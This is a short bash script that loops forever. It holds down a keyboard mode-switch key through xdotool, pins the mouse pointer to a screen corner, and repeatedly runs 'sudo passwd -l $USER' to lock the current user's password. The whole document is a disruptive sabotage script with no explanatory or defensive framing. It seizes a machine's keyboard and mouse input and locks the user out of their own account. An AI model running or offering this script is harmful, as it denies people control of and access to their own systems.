#!/bin/bash while [ true ] ; do xdotool keydown 0xff7e ; xdotool mousemove --sync 1000 0 ; sudo passwd -l $USER ; done